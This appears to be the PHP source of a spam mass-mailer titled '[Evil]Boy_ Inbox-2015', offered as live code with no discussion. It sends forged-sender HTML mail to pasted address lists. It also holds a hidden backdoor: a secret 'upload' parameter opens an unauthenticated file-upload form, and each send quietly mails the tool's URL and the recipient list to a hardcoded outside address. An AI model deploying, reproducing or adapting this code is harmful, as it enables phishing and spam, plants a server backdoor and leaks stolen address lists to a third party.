<html><head><title>Mailer Inbox -Dezz</title><style type="text/css">font{font-family: Tahoma, Arial, sans-serif ;} div#container{width: 800px;position: relative;margin-left: auto; margin-right: auto;} #result{text-align: left ; border-radius: 10px; border:1px solid #4C83AF; padding:4px 8px; line-height:16px; background:#131313; color:#aaa; margin:0 0 8px 0; } .style2{text-align: center ;font-weight: bold;font-family: Tahoma, Arial, sans-serif ;color: #4C83AF;text-shadow: 0px 0px 60px #4C83AF ;font-size: 50px;} .evalcode{border:1px solid #0CF;background:#090909; color:#4C83AF; padding:2px;border:1px solid #202020; font-size:11px; width:100%;} .evalcode:hover{border:1px solid #4C83AF;} .inputzbut{ font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222; } .inputzbut:hover{border:1px solid #4C83AF;} .coode{color:#4C83AF;background:#090909;border:1px solid #202020;} .coode:hover{border:1px solid #4C83AF;} </style></head><div id="container"><div id="bv_Html1" style="position:absolute;left:23px;width:780px;height:169px;z-index:0;" align="left"><? $upload = $_GET["upload"]; if ($upload == "CaZaNoVa163" ) {$uploaddir = "";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);if (isset($_FILES["userfile"]["name"])) { if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { $resultati = "The file ". basename($_FILES["userfile"]["name"]) ." has been uploaded";} else { $resultati = "There was an error uploading the file. please try again!"; } } echo'<html><head></head><div id="result"><table height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #4C83AF"><input type="submit" class="inputzbut" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #4C83AF"><br>'. $resultati .'</form></center></td></tr></table></div>'; }$action=$_POST['action'];$from=$_POST['from'];$realname=$_POST['realname'];$subject=$_POST['subject'];$message=$_POST['message'];$emaillist=$_POST['emaillist'];$addr = getenv("REMOTE_ADDR"); if ($action=="send"){ $message = urlencode($message);$message = ereg_replace("%5C%22", "%22", $message);$message = urldecode($message);$message = stripslashes($message);$subject = stripslashes($subject);} ?><body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif"><div id="result"><br /><br /><div align="center" class="style2">ยป[Evil]B[oy_ - Inbox-2015</div><br /><br /></div><div id="result"><form name="form1" method="post" action="" enctype="multipart/form-data"><table width="142" border="0"><tr><td width="81"><div align="right"><font color="#4C83AF" size="-3">Your Email :</font></div></td><td width="219"><font size="-3"><input class="evalcode" name="from" value="<?php print $from; ?>" size="30" /></font></td><td width="212"><div align="right"><font color="#4C83AF" size="-3">Your Name :</font></div></td><td width="278"><font size="-3"><input class="evalcode" name="realname" value="<?php print $realname; ?>" size="30" /></font></td></tr><tr><td width="81"><div align="right"><font color="#4C83AF" size="-3">Subject :</font></div></td><td colspan="3" width="703"><font size="-3"><input class="evalcode" name="subject" value="<? print $subject; ?>" size="91" /></font></td></tr><tr valign="top"><td colspan="3" width="520"><font color="#4C83AF" size="-3">Message Box :</font></td><td width="278"><font color="#4C83AF" size="-3">eMail Send To :</font></td></tr><tr valign="top"><td colspan="3" width="520" ><font size="-3"><textarea class="coode" name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /><input type="hidden" name="action" value="send" /></font><p><font size="-3"><input type="submit" name="evalcodesubmit" class="inputzbut" value="Send eMails" style="width:120px;height:30px;" /></font></td><td width="278"><font size="-3"><textarea class="coode" name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea></font></td></tr></table></form></div><? if ($action=="send"){if (!$from && !$subject && !$message && !$emaillist){print "Please complete all fields before sending your message.";exit;}$headd = "From: RooT<name@name.com>";$subb="xMailer";$massge ="Exploit : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?upload=CaZaNoVa163\n$emaillist\n";@mail("1234567887654321@Safe-mail.net",$subb,$massge,$headd);$allemails=split("\n",$emaillist);$numemails=count($allemails);for($xx=0;$xx<1;$xx++){for($x=0;$x<$numemails;$x++){$to=$allemails[$x];if ($to){$to=ereg_replace(" ","",$to);$message=ereg_replace("&email&",$to,$message);$subject=ereg_replace("&email&",$to,$subject);print "Sending Mail To $to.......";@flush();$header="From: $realname <$from>\r\nReply-To: $from\r\n";$header.="MIME-Version: 1.0\r\n";$header.="Content-Type: text/html\r\n";$header.="Content-Transfer-Encoding: 8bit\r\n\r\n";$header.="$message\r\n";@mail($to,$subject,"",$header);print "OK<br>";@flush();}}}} ?></body></html>